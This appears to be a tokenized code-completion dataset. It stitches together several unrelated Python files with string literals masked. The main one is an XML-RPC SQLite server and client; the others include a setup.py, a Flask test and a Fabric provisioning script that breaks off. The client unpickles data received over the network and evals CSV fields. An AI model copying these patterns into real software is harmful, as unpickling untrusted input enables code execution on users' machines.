password <EOL> class Server ( object ) : <EOL> """<STR_LIT>""" <EOL> _test_mode = False <EOL> def __init__ ( self , <EOL> username = '<STR_LIT:username>' , password = '<STR_LIT:password>' , <EOL> directory = '<STR_LIT>' , <EOL> address = "<STR_LIT:localhost>" , port = <NUM_LIT> , <EOL> auto_run = True ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in username or '<STR_LIT>' in password or '<STR_LIT>' in address or '<STR_LIT>' in directory : <EOL> raise ValueError , '<STR_LIT>' <EOL> self . pid = <NUM_LIT:0> <EOL> self . test = self . __class__ . _test_mode <EOL> if self . test : <EOL> directory = tempfile . mkdtemp ( ) <EOL> self . directory = str ( directory ) <EOL> self . username = username <EOL> self . password = password <EOL> if not os . path . exists ( directory ) : <EOL> os . makedirs ( directory ) <EOL> self . address = str ( address ) <EOL> self . port = int ( port ) <EOL> self . _dbs = { } <EOL> if auto_run : <EOL> self . _run ( ) <EOL> def __del__ ( self ) : <EOL> try : <EOL> self . quit ( ) <EOL> finally : <EOL> if hasattr ( self , '<STR_LIT:test>' ) and self . test : <EOL> shutil . rmtree ( self . directory , ignore_errors = True ) <EOL> def db ( self , file ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . _dbs [ file ] <EOL> except KeyError : <EOL> db = sqlite3 . connect ( file ) <EOL> self . _dbs [ file ] = db <EOL> return db <EOL> def quit ( self ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self , '<STR_LIT>' ) and self . pid : <EOL> os . kill ( self . pid , <NUM_LIT:9> ) <EOL> self . pid = <NUM_LIT:0> <EOL> def _run ( self , max_tries = <NUM_LIT:1000> ) : <EOL> """<STR_LIT>""" <EOL> port = self . port <EOL> success = False <EOL> for i in range ( max_tries ) : <EOL> try : <EOL> server = VerifyingServer ( <EOL> self . username , self . password , <EOL> ( self . address , port ) , allow_none = True ) <EOL> success = True <EOL> break <EOL> except socket . 
error : <EOL> port += <NUM_LIT:1> <EOL> if not success : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . port = port <EOL> pid = os . fork ( ) <EOL> if pid != <NUM_LIT:0> : <EOL> self . pid = pid <EOL> self . port = port <EOL> return port <EOL> def execute ( cmds , t , file = '<STR_LIT:default>' , many = False ) : <EOL> db = self . db ( os . path . join ( self . directory , file ) if file != '<STR_LIT>' else file ) <EOL> cursor = db . cursor ( ) <EOL> if isinstance ( cmds , str ) : <EOL> if t is not None : <EOL> cmds = [ ( cmds , t ) ] <EOL> else : <EOL> cmds = [ cmds ] <EOL> v = [ ] <EOL> for c in cmds : <EOL> try : <EOL> if isinstance ( c , tuple ) : <EOL> o = cursor . executemany ( * c ) if many else cursor . execute ( * c ) <EOL> else : <EOL> o = cursor . execute ( c ) <EOL> except sqlite3 . OperationalError , e : <EOL> raise RuntimeError ( "<STR_LIT:%s>" % e ) <EOL> v . extend ( list ( o ) ) <EOL> db . commit ( ) <EOL> return v <EOL> server . register_function ( execute , '<STR_LIT>' ) <EOL> server . serve_forever ( ) <EOL> def help ( self ) : <EOL> """<STR_LIT>""" <EOL> fqdn = socket . getfqdn ( ) <EOL> print ( "<STR_LIT:->" * <NUM_LIT> ) <EOL> print ( self ) <EOL> s = "<STR_LIT>" % ( self . port , self . username ) <EOL> if self . address != '<STR_LIT:localhost>' : <EOL> s += "<STR_LIT>" % self . address <EOL> else : <EOL> s += "<STR_LIT:)>" <EOL> print s <EOL> print ( "<STR_LIT>" ) <EOL> if self . address == '<STR_LIT:localhost>' : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" % ( self . port , self . port , fqdn ) ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" % ( self . port , self . username ) ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" % os . getpid ( ) ) <EOL> print ( "<STR_LIT:->" * <NUM_LIT> ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . pid == <NUM_LIT:0> : <EOL> return "<STR_LIT>" <EOL> s = "<STR_LIT>" % self . port <EOL> if self . 
address != '<STR_LIT:localhost>' : <EOL> s += '<STR_LIT>' % self . address <EOL> return s <EOL> class LocalServer ( object ) : <EOL> def __init__ ( self , directory ) : <EOL> self . directory = directory <EOL> self . _dbs = { } <EOL> if not os . path . exists ( directory ) : <EOL> os . makedirs ( directory ) <EOL> def db ( self , file ) : <EOL> try : <EOL> return self . _dbs [ file ] <EOL> except KeyError : <EOL> db = sqlite3 . connect ( file ) <EOL> self . _dbs [ file ] = db <EOL> return db <EOL> def execute ( self , cmds , t , file = '<STR_LIT:default>' , many = False ) : <EOL> db = self . db ( os . path . join ( self . directory , file ) if file != '<STR_LIT>' else file ) <EOL> cursor = db . cursor ( ) <EOL> if isinstance ( cmds , str ) : <EOL> if t is not None : <EOL> cmds = [ ( cmds , t ) ] <EOL> else : <EOL> cmds = [ cmds ] <EOL> v = [ ] <EOL> for c in cmds : <EOL> try : <EOL> if isinstance ( c , tuple ) : <EOL> o = cursor . executemany ( * c ) if many else cursor . execute ( * c ) <EOL> else : <EOL> o = cursor . execute ( c ) <EOL> except sqlite3 . OperationalError , e : <EOL> raise RuntimeError ( "<STR_LIT:%s>" % e ) <EOL> v . extend ( list ( o ) ) <EOL> db . commit ( ) <EOL> return v <EOL> socket . setdefaulttimeout ( <NUM_LIT:10> ) <EOL> class Client ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , port_or_dir = <NUM_LIT> , username = '<STR_LIT:username>' , password = '<STR_LIT:password>' , <EOL> address = "<STR_LIT:localhost>" ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in str ( port_or_dir ) or '<STR_LIT>' in username or '<STR_LIT>' in password or '<STR_LIT>' in address : <EOL> raise ValueError , '<STR_LIT>' <EOL> if isinstance ( port_or_dir , str ) : <EOL> self . server = LocalServer ( port_or_dir ) <EOL> else : <EOL> self . address = str ( address ) <EOL> self . port = int ( port_or_dir ) <EOL> self . server = xmlrpclib . Server ( '<STR_LIT>' % <EOL> ( username , password , address , self . 
port ) , <EOL> allow_none = True ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> s = "<STR_LIT>" % self . port <EOL> if self . address != '<STR_LIT:localhost>' : <EOL> s += '<STR_LIT>' % self . address <EOL> return s <EOL> def __call__ ( self , cmd , t = None , file = '<STR_LIT:default>' , many = False , coerce = True ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( cmd , str ) : <EOL> raise TypeError ( "<STR_LIT>" % cmd ) <EOL> if coerce : <EOL> if many : <EOL> t = [ tuple ( [ self . _coerce_ ( x ) for x in y ] ) for y in t ] <EOL> else : <EOL> if t is not None : <EOL> t = tuple ( [ self . _coerce_ ( x ) for x in t ] ) <EOL> try : <EOL> return self . server . execute ( cmd , t , file , many ) <EOL> except xmlrpclib . Fault , e : <EOL> raise RuntimeError , str ( e ) + '<STR_LIT>' % cmd <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if name == '<STR_LIT>' : <EOL> name = '<STR_LIT>' <EOL> return Database ( self , name ) <EOL> def _coerce_ ( self , x ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( x , bool ) : <EOL> x = int ( x ) <EOL> elif isinstance ( x , ( str , int , long , float ) ) : <EOL> pass <EOL> elif x is None : <EOL> pass <EOL> elif is_Integer ( x ) and x . nbits ( ) < <NUM_LIT:32> : <EOL> x = int ( x ) <EOL> elif is_RealNumber ( x ) and x . prec ( ) == <NUM_LIT> : <EOL> return float ( x ) <EOL> elif isinstance ( x , unicode ) : <EOL> return str ( x ) <EOL> else : <EOL> x = '<STR_LIT>' + base64 . b64encode ( zlib . compress ( cPickle . dumps ( x , <NUM_LIT:2> ) ) ) <EOL> return x <EOL> def _coerce_back_ ( self , x ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( x , ( str , unicode ) ) and x . startswith ( '<STR_LIT>' ) : <EOL> return cPickle . loads ( zlib . decompress ( base64 . b64decode ( x [ <NUM_LIT:8> : ] ) ) ) <EOL> return x <EOL> class Database ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client , name ) : <EOL> """<STR_LIT>""" <EOL> self . client = client <EOL> self . 
name = str ( name ) <EOL> def vacuum ( self ) : <EOL> """<STR_LIT>""" <EOL> self ( '<STR_LIT>' ) <EOL> def __call__ ( self , cmds , t = None , many = False , coerce = True ) : <EOL> """<STR_LIT>""" <EOL> return self . client ( cmds , t , file = self . name , many = many , coerce = coerce ) <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return Collection ( self , name ) <EOL> def trait_names ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ C . name for C in self . collections ( ) ] <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % self . name <EOL> def collections ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = "<STR_LIT>" <EOL> return [ Collection ( self , x [ <NUM_LIT:0> ] ) for x in self ( cmd ) ] <EOL> class Collection ( object ) : <EOL> def __init__ ( self , database , name ) : <EOL> """<STR_LIT>""" <EOL> self . database = database <EOL> self . name = str ( name ) <EOL> def __call__ ( self , * args , ** kwds ) : <EOL> return self . database ( * args , ** kwds ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( self . database . name , self . name ) <EOL> def __len__ ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> cmd = '<STR_LIT>' % self . name <EOL> return int ( self . database ( cmd ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> except RuntimeError : <EOL> if len ( self . _columns ( ) ) == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> raise <EOL> def _validate_column_names ( self , columns ) : <EOL> """<STR_LIT>""" <EOL> for c in columns : <EOL> if '<STR_LIT:">' in c : <EOL> raise ValueError , "<STR_LIT>" % c <EOL> def _create ( self , columns ) : <EOL> """<STR_LIT>""" <EOL> self . _validate_column_names ( columns ) <EOL> self . database ( '<STR_LIT>' % ( self . name , '<STR_LIT:U+002CU+0020>' . 
join ( '<STR_LIT>' % s for s in columns ) ) ) <EOL> def insert ( self , d = None , coerce = True , on_conflict = None , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> if d is None : <EOL> d = kwds <EOL> elif isinstance ( d , dict ) : <EOL> d . update ( kwds ) <EOL> else : <EOL> if len ( kwds ) > <NUM_LIT:0> : <EOL> raise ValueError , "<STR_LIT>" <EOL> if isinstance ( d , list ) : <EOL> keys = set ( ) . union ( * d ) <EOL> else : <EOL> keys = set ( d . keys ( ) ) <EOL> current_cols = self . _columns ( ) <EOL> new_columns = keys . difference ( current_cols ) <EOL> if len ( current_cols ) == <NUM_LIT:0> : <EOL> self . _create ( new_columns ) <EOL> else : <EOL> self . _add_columns ( new_columns ) <EOL> if isinstance ( d , list ) : <EOL> for v in _constant_key_grouping ( d ) : <EOL> cmd = _insert_statement ( self . name , v [ <NUM_LIT:0> ] . keys ( ) , on_conflict ) <EOL> self . database ( cmd , [ x . values ( ) for x in v ] , many = True , coerce = coerce ) <EOL> else : <EOL> self . database ( _insert_statement ( self . name , d . keys ( ) , on_conflict ) , d . values ( ) , coerce = coerce ) <EOL> def rename ( self , new_name ) : <EOL> """<STR_LIT>""" <EOL> cmd = "<STR_LIT>" % ( self . name , new_name ) <EOL> self . database ( cmd ) <EOL> self . name = new_name <EOL> def copy ( self , collection , query = '<STR_LIT>' , fields = None , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( collection , str ) : <EOL> collection = self . database . __getattr__ ( collection ) <EOL> fields = self . _columns ( ) if fields is None else fields <EOL> other = collection . _columns ( ) <EOL> cols = set ( fields ) . difference ( other ) <EOL> if len ( other ) == <NUM_LIT:0> : <EOL> collection . _create ( cols ) <EOL> elif cols : <EOL> collection . _add_columns ( cols ) <EOL> c = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % x for x in fields ] ) <EOL> cmd = '<STR_LIT>' % ( <EOL> collection . name , c , c , self . name , self . _where_clause ( query , kwds ) ) <EOL> self . 
database ( cmd ) <EOL> def update ( self , d , query = '<STR_LIT>' , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> new_cols = set ( d . keys ( ) ) . difference ( self . _columns ( ) ) <EOL> if new_cols : <EOL> self . _add_columns ( new_cols ) <EOL> t = tuple ( [ self . database . client . _coerce_ ( x ) for x in d . values ( ) ] ) <EOL> s = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % x for x in d . keys ( ) ] ) <EOL> cmd = '<STR_LIT>' % ( <EOL> self . name , s , self . _where_clause ( query , kwds ) ) <EOL> self . database ( cmd , t ) <EOL> def export_csv ( self , csvfile , delimiter = '<STR_LIT:U+0020>' , quotechar = '<STR_LIT:|>' , order_by = None , write_columns = True ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( csvfile , str ) : <EOL> csvfile = open ( csvfile , '<STR_LIT:wb>' ) <EOL> import csv <EOL> W = csv . writer ( csvfile , delimiter = delimiter , quotechar = quotechar , quoting = csv . QUOTE_MINIMAL ) <EOL> cmd = '<STR_LIT>' % self . name <EOL> if order_by is not None : <EOL> cmd += '<STR_LIT>' % order_by <EOL> if write_columns : <EOL> W . writerow ( self . columns ( ) ) <EOL> for x in self . database ( cmd ) : <EOL> W . writerow ( [ '<STR_LIT>' % a for a in x ] ) <EOL> def import_csv ( self , csvfile , columns = None , delimiter = '<STR_LIT:U+0020>' , quotechar = '<STR_LIT:|>' ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( csvfile , str ) : <EOL> csvfile = open ( csvfile , '<STR_LIT:rb>' ) <EOL> import csv <EOL> R = csv . reader ( csvfile , delimiter = delimiter , quotechar = quotechar ) <EOL> if columns is None : <EOL> columns = R . next ( ) <EOL> d = [ ] <EOL> for x in R : <EOL> z = { } <EOL> for i in range ( len ( x ) ) : <EOL> y = x [ i ] <EOL> if y != '<STR_LIT>' : <EOL> if y . isdigit ( ) : <EOL> y = eval ( y ) <EOL> else : <EOL> v = y . split ( '<STR_LIT:.>' ) <EOL> if len ( v ) == <NUM_LIT:2> and v [ <NUM_LIT:0> ] . isdigit ( ) and v [ <NUM_LIT:1> ] . isdigit ( ) : <EOL> y = eval ( y ) <EOL> z [ columns [ i ] ] = y <EOL> d . 
append ( z ) <EOL> self . insert ( d ) <EOL> def delete ( self , query = '<STR_LIT>' , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> if not query and len ( kwds ) == <NUM_LIT:0> : <EOL> if len ( self . _columns ( ) ) == <NUM_LIT:0> : <EOL> return <EOL> cmd = '<STR_LIT>' % self . name <EOL> else : <EOL> cmd = '<STR_LIT>' % ( self . name , self . _where_clause ( query , kwds ) ) <EOL> self . database ( cmd ) <EOL> def _index_pattern ( self , kwds ) : <EOL> """<STR_LIT>""" <EOL> cols = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % ( column , '<STR_LIT>' if direction < <NUM_LIT:0> else '<STR_LIT>' ) for <EOL> column , direction in sorted ( kwds . iteritems ( ) ) ] ) <EOL> index_name = '<STR_LIT>' % ( self . name , cols . replace ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) ) <EOL> return cols , index_name <EOL> def ensure_index ( self , unique = None , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> if len ( kwds ) == <NUM_LIT:0> : <EOL> raise ValueError , "<STR_LIT>" <EOL> cols , index_name = self . _index_pattern ( kwds ) <EOL> current_cols = self . columns ( ) <EOL> new_cols = [ c for c in sorted ( kwds . keys ( ) ) if c not in current_cols ] <EOL> if new_cols : <EOL> if not current_cols : <EOL> self . _create ( new_cols ) <EOL> else : <EOL> self . _add_columns ( new_cols ) <EOL> cmd = "<STR_LIT>" % ( <EOL> '<STR_LIT>' if unique else '<STR_LIT>' , index_name , self . name , cols ) <EOL> self . database ( cmd ) <EOL> def drop_index ( self , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> cols , index_name = self . _index_pattern ( kwds ) <EOL> cmd = '<STR_LIT>' % index_name <EOL> self . database ( cmd ) <EOL> def drop_indexes ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = "<STR_LIT>" % self . name <EOL> for x in self . database ( cmd ) : <EOL> if x [ <NUM_LIT:1> ] . startswith ( '<STR_LIT>' ) : <EOL> self . database ( '<STR_LIT>' % x [ <NUM_LIT:1> ] ) <EOL> def indexes ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = "<STR_LIT>" % self . 
name <EOL> v = [ ] <EOL> for x in self . database ( cmd ) : <EOL> d = { } <EOL> for a in x [ <NUM_LIT:1> ] . split ( '<STR_LIT>' ) [ <NUM_LIT:2> : ] : <EOL> if a . endswith ( '<STR_LIT>' ) : <EOL> d [ a [ : - <NUM_LIT:3> ] ] = <NUM_LIT:1> <EOL> else : <EOL> d [ a [ : - <NUM_LIT:4> ] ] = - <NUM_LIT:1> <EOL> v . append ( d ) <EOL> return v <EOL> def _columns ( self ) : <EOL> """<STR_LIT>""" <EOL> a = self . database ( '<STR_LIT>' % self . name ) <EOL> if a is None : <EOL> return [ ] <EOL> return [ x [ <NUM_LIT:1> ] for x in a ] <EOL> def columns ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ x for x in self . _columns ( ) if x != '<STR_LIT>' ] <EOL> def _add_columns ( self , new_columns ) : <EOL> """<STR_LIT>""" <EOL> self . _validate_column_names ( new_columns ) <EOL> for col in new_columns : <EOL> try : <EOL> self . database ( '<STR_LIT>' % ( self . name , col ) ) <EOL> except xmlrpclib . Fault : <EOL> pass <EOL> def find_one ( self , * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> v = list ( self . find ( * args , limit = <NUM_LIT:1> , ** kwds ) ) <EOL> if len ( v ) == <NUM_LIT:0> : <EOL> raise ValueError , "<STR_LIT>" <EOL> return v [ <NUM_LIT:0> ] <EOL> def _where_clause ( self , query , kwds ) : <EOL> """<STR_LIT>""" <EOL> if len ( kwds ) > <NUM_LIT:0> : <EOL> for key , val in kwds . iteritems ( ) : <EOL> val = self . database . client . _coerce_ ( val ) <EOL> if query : <EOL> query += '<STR_LIT>' % ( key , val ) <EOL> else : <EOL> query = '<STR_LIT>' % ( key , val ) <EOL> return '<STR_LIT>' + query if query else '<STR_LIT>' <EOL> def _find_cmd ( self , query = '<STR_LIT>' , fields = None , limit = None , offset = <NUM_LIT:0> , <EOL> order_by = None , batch_size = <NUM_LIT:50> , _rowid = False , _count = False , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' if _rowid else '<STR_LIT>' <EOL> if fields is None : <EOL> cmd += '<STR_LIT>' if _count else '<STR_LIT>' <EOL> cmd += '<STR_LIT>' % self . 
name <EOL> else : <EOL> if isinstance ( fields , str ) : <EOL> fields = [ fields ] <EOL> cmd += '<STR_LIT>' % ( '<STR_LIT:U+002C>' . join ( fields ) , self . name ) <EOL> cmd += self . _where_clause ( query , kwds ) <EOL> if order_by is not None : <EOL> cmd += '<STR_LIT>' % order_by <EOL> batch_size = int ( batch_size ) <EOL> if limit is not None : <EOL> cmd += '<STR_LIT>' % int ( limit ) <EOL> else : <EOL> cmd += '<STR_LIT>' % batch_size <EOL> if offset is not None : <EOL> cmd += '<STR_LIT>' % int ( offset ) <EOL> return cmd <EOL> def count ( self , * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> kwds [ '<STR_LIT>' ] = True <EOL> cmd = self . _find_cmd ( * args , ** kwds ) <EOL> return self . database ( cmd ) [ <NUM_LIT:0> ] <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . find ( ) <EOL> def find ( self , query = '<STR_LIT>' , fields = None , batch_size = <NUM_LIT:50> , <EOL> order_by = None , _rowid = False , limit = None , offset = <NUM_LIT:0> , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> cmd = self . _find_cmd ( query = query , fields = fields , batch_size = batch_size , <EOL> _rowid = _rowid , order_by = order_by , <EOL> limit = limit , offset = offset , ** kwds ) <EOL> convert = self . database . client . _coerce_back_ <EOL> while True : <EOL> cols = self . _columns ( ) <EOL> if len ( cols ) == <NUM_LIT:0> : <EOL> return <EOL> v = self . database ( cmd ) <EOL> if fields is None : <EOL> columns = cols <EOL> else : <EOL> columns = fields <EOL> columns = ( [ '<STR_LIT>' ] if _rowid else [ ] ) + columns <EOL> for x in v : <EOL> yield dict ( [ a for a in zip ( columns , [ convert ( y ) for y in x ] ) <EOL> if a [ <NUM_LIT:1> ] is not None ] ) <EOL> if limit is not None or len ( v ) == <NUM_LIT:0> : <EOL> return <EOL> i = cmd . 
rfind ( '<STR_LIT>' ) <EOL> offset += batch_size <EOL> cmd = cmd [ : i ] + '<STR_LIT>' % offset <EOL> def _insert_statement ( table , cols , on_conflict = None ) : <EOL> """<STR_LIT>""" <EOL> conflict = '<STR_LIT>' % on_conflict if on_conflict else '<STR_LIT>' <EOL> cols = [ '<STR_LIT>' % c for c in cols ] <EOL> return '<STR_LIT>' % ( conflict , table , '<STR_LIT:U+002C>' . join ( cols ) , '<STR_LIT:U+002C>' . join ( [ '<STR_LIT:?>' ] * len ( cols ) ) ) <EOL> def _constant_key_grouping ( d ) : <EOL> """<STR_LIT>""" <EOL> x = { } <EOL> for a in d : <EOL> k = tuple ( a . keys ( ) ) <EOL> if x . has_key ( k ) : <EOL> x [ k ] . append ( a ) <EOL> else : <EOL> x [ k ] = [ a ] <EOL> return x . values ( ) <EOL> server = Server <EOL> client = Client <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import doctest <EOL> class TestServer ( Server ) : <EOL> _test_mode = True <EOL> doctest . testmod ( optionflags = doctest . ELLIPSIS , <EOL> extraglobs = { '<STR_LIT>' : TestServer , '<STR_LIT>' : TestServer } ) </s>
<s> __version__ = <NUM_LIT:0.1> <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] </s>
<s> import sys <EOL> from django . core . management . base import BaseCommand <EOL> from dennis . cmdline import click_run <EOL> class DennisBaseCommand ( BaseCommand ) : <EOL> """<STR_LIT>""" <EOL> def run_from_argv ( self , argv ) : <EOL> self . execute ( * argv ) <EOL> def handle ( self , * args , ** options ) : <EOL> if self . dennis_subcommand in args : <EOL> args = args [ args . index ( self . dennis_subcommand ) + <NUM_LIT:1> : ] <EOL> args = [ '<STR_LIT>' , self . dennis_subcommand ] + list ( args ) <EOL> sys . argv = args <EOL> click_run ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from setuptools import setup , find_packages <EOL> sys . path . append ( '<STR_LIT>' ) <EOL> sys . path . append ( '<STR_LIT>' ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> description = __doc__ , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> packages = find_packages ( ) , <EOL> platforms = [ '<STR_LIT>' ] , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> } , <EOL> tests_require = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> test_suite = '<STR_LIT>' , <EOL> ) </s>
<s> import unittest <EOL> from flask . ext . testing import TestCase <EOL> from tango . app import Tango <EOL> class AppInitTestCase ( TestCase ) : <EOL> def create_app ( self ) : <EOL> return Tango . build_app ( '<STR_LIT>' ) <EOL> def setUp ( self ) : <EOL> self . client = self . app . test_client ( ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def test_static ( self ) : <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_config ( self ) : <EOL> self . assertEqual ( self . app . config [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from . bundletypes import Coords , Tracks , Listfile , Rotfile , Bundle <EOL> from . sfminittypes import ( read_rot_file , write_rot_file , <EOL> read_trans_soln_file , write_trans_soln_file , <EOL> read_edge_weight_file , write_edge_weight_file , <EOL> read_EGs_file , write_EGs_file ) <EOL> from . onedsfm import oneDSfM <EOL> from . transproblem import TransProblem <EOL> from . twoview import ModelList <EOL> from . rotsolver import solve_global_rotations <EOL> from . utils import indices_to_direct , SO3_geodesic_norm , SO3_geodesic_metric <EOL> from . hornsmethod import robust_horn </s>
<s> """<STR_LIT>""" <EOL> VERSION = ( <NUM_LIT:0> , <NUM_LIT:8> , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> __version__ = "<STR_LIT:.>" . join ( map ( str , VERSION [ : - <NUM_LIT:1> ] ) ) <EOL> __release__ = "<STR_LIT:.>" . join ( map ( str , VERSION ) ) <EOL> __author__ = "<STR_LIT>" <EOL> __contact__ = "<STR_LIT>" <EOL> __homepage__ = "<STR_LIT>" <EOL> __docformat__ = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import time <EOL> import os <EOL> from fabric . api import sudo , run , env , require , hide , cd , put <EOL> from fabric . contrib . files import upload_template <EOL> from fabric . contrib . project import rsync_project <EOL> from neckbeard . environment_manager import WAIT_TIME <EOL> from neckbeard . brain_wrinkles import BaseProvisioner <EOL> from neckbeard . brain_wrinkles . pstat import ( <EOL> upload_template_changed , <EOL> put_changed , <EOL> ) <EOL> from neckbeard . output import fab_out_opts , fab_quiet_opts <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> fab_output_hides = fab_out_opts [ logger . getEffectiveLevel ( ) ] <EOL> fab_quiet = fab_quiet_opts [ logger . getEffectiveLevel ( ) ] <EOL> LINKED_DIRS = [ '<STR_LIT>' ] <EOL> LOG_DIR = '<STR_LIT>' <EOL> VENV_PTH = '<STR_LIT>' <EOL> PYTHON_BIN = '<STR_LIT>' % VENV_PTH <EOL> PIP_BIN = '<STR_LIT>' % VENV_PTH <EOL> MEDIA_STORAGE_ROOT = '<STR_LIT>' <EOL> GITHUB_TERRARIUM = '<STR_LIT>' <EOL> ACTIVE_SOURCE_SYMLINK = '<STR_LIT>' <EOL> CONFIG_TPL_DIR = os . path . abspath ( '<STR_LIT>' ) <EOL> EC2_SCRIPTS_TPL_DIR = os . path . abspath ( '<STR_LIT>' ) <EOL> SUPERVISORD = '<STR_LIT>' <EOL> API_ENDPOINT = '<STR_LIT>' <EOL> FILE_OWNER = '<STR_LIT>' <EOL> F_CHOWN = '<STR_LIT>' % ( FILE_OWNER , FILE_OWNER ) <EOL> class AppServerProvisioner ( BaseProvisioner ) : <EOL> """<STR_LIT>""" <EOL> services = [ '<STR_LIT>' ] <EOL> vestigial_packages = [ ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( AppServerProvisioner , self ) . __init__ ( * args , ** kwargs ) <EOL> self . modified_services = [ ] <EOL> def start_services ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" , self . services ) <EOL> for service in self . services : <EOL> with hide ( * fab_quiet ) : <EOL> sudo ( '<STR_LIT>' % service ) <EOL> def stop_services ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" , self . 
services ) <EOL> for service in self . services : <EOL> with hide ( * fab_quiet ) : <EOL> sudo ( '<STR_LIT>' % service ) <EOL> def fix_folder_perms ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> if self . is_local_db ( ) : <EOL> with hide ( * fab_quiet ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> with hide ( * fab_quiet ) : <EOL> sudo ( '<STR_LIT>' % F_CHOWN ) <EOL> sudo ( '<STR_LIT>' % F_CHOWN ) <EOL> sudo ( '<STR_LIT>' % F_CHOWN ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' % MEDIA_STORAGE_ROOT ) <EOL> sudo ( '<STR_LIT>' % ( F_CHOWN , MEDIA_STORAGE_ROOT ) ) <EOL> sudo ( '<STR_LIT>' % MEDIA_STORAGE_ROOT ) <EOL> def do_first_launch_config ( self ) : <EOL> self . _do_set_hostname ( ) <EOL> if self . is_local_db ( ) : <EOL> mysql_install = '<STR_LIT>' <EOL> sudo ( mysql_install ) <EOL> logger . info ( "<STR_LIT>" , self . vestigial_packages ) <EOL> for package in self . vestigial_packages : <EOL> with hide ( * fab_output_hides ) : <EOL> result = sudo ( '<STR_LIT>' % package ) <EOL> if result . failed : <EOL> logger . warning ( "<STR_LIT>" , package ) <EOL> logger . warning ( "<STR_LIT>" , result ) <EOL> with hide ( * fab_output_hides ) : <EOL> push_ssl_crt ( ) <EOL> self . _fix_pstat_logging_perms ( ) <EOL> self . _create_db_and_user ( ) <EOL> self . _configure_sphinx ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( 